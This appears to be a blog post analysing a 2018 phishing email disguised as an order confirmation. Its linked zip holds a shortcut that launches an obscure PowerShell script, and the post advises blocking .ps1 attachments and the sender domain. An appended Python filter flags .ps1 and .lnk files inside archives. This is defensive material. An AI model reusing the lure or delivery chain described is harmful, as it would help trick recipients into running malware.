Spam Warning: Your Name, Pack(50RM_84248) confirmed: 7 items sent
This email has been assembled by sourcing information from your personal history online. In this example they have sourced an old telephone number from somewhere, probably sold to them by our local council.
From: Direct <[email protected]>
Sent: Thursday, August 9, 2018 6:35 AM
To: Recipient
Subject: Your Name, Pack(50RM_84248) confirmed: 7 items sent
Order Acknowledgment
Dear Your name,
Your order is now confirmed. Thanks for shopping with us!
Billing Address: Your Name Your Telephone Number Postcode
Your Order Reference: 50RM_84248
Order Date: 8/9/2018
Delivery Address: Your Name Your Telephone Number Postcode
Your Order 50RM_84248 available here
Your right to cancel: In addition to the EU and UK Distance Selling Regulations, we offer you 30 days to change your mind on any purchase. To cancel the order, please complete the enclosed returns slip and return the item(s) to us at the address that is on the returns slip. We recommend that you use a recorded delivery service. Please note that you are responsible for the costs of returning the items to us unless the goods delivered are incorrect or faulty. In this case, you will be credited for the cost of your return up to a reasonable amount. As soon as we receive your item(s) the returns procedure will be initiated and refunds will be processed.
The actual link downloads a zip file:
The contents of the zip file are as follows:
And when extracted, reveal:
The image just being a Google Pay image:
And the shortcut linking to:
As we can see, this is another Windows PowerShell command, but one which we cannot make head or tail of - fildunare is not a term which any of us recognise, so any light anyone can shed would be most welcome.
Either way, it is attempting to find the string fildunare with a .lnk extension in your documents and invokes desktop.ps1, which doesn't actually seem to be included with any version of Windows and so is a bit of a mystery.
Either way, make sure that .ps1 files are blocked inside of attachments, especially archive files, and this will not be an issue.
The originating email domain - glampiny.com - does not seem to be a website either, so block that domain at your email server.
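One way to apply the advice above about blocking .ps1 files inside archive attachments, as an added example that is not part of the original post: a Python check a mail filter could run on a zip attachment, looking inside nested zips as well. The function names, the depth limit and the inclusion of .lnk in the block list (added because this zip delivered a shortcut) are assumptions, and the sample archive is constructed.

```python
import io
import zipfile

# .ps1 is the extension the post says to block; .lnk is an assumption added
# here because the archive in this campaign delivered a shortcut.
BLOCKED = {".ps1", ".lnk"}
MAX_DEPTH = 3  # assumed cap on nested archives


def blocked_members(data, depth=0, prefix=""):
    """Return archive member paths that a mail filter should reject."""
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return [prefix + "<unreadable archive>"]  # fail closed
    hits = []
    with archive:
        for info in archive.infolist():
            if info.is_dir():
                continue
            path = prefix + info.filename
            # Windows ignores trailing dots and spaces, so "x.ps1." is x.ps1
            name = info.filename.lower().rstrip(". ")
            ext = "." + name.rsplit(".", 1)[-1] if "." in name else ""
            if ext in BLOCKED:
                hits.append(path)
            elif ext == ".zip" and depth >= MAX_DEPTH:
                hits.append(path + " <nested too deep>")
            elif ext == ".zip":
                try:
                    inner = archive.read(info)
                except (RuntimeError, NotImplementedError, zipfile.BadZipFile):
                    hits.append(path + " <unreadable member>")  # e.g. encrypted
                    continue
                hits.extend(blocked_members(inner, depth + 1, path + "!"))
    return hits


def make_sample():
    """Constructed sample: image, shortcut, and a nested zip with a script."""
    inner, outer = io.BytesIO(), io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr("desktop.ps1", "# placeholder text")
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("image.png", b"placeholder")
        z.writestr("Order.LNK", b"placeholder")
        z.writestr("more.zip", inner.getvalue())
    return outer.getvalue()
```

An empty result means the attachment can pass this check; anything else is a reason to quarantine. A production filter would also cap member sizes before reading nested archives into memory.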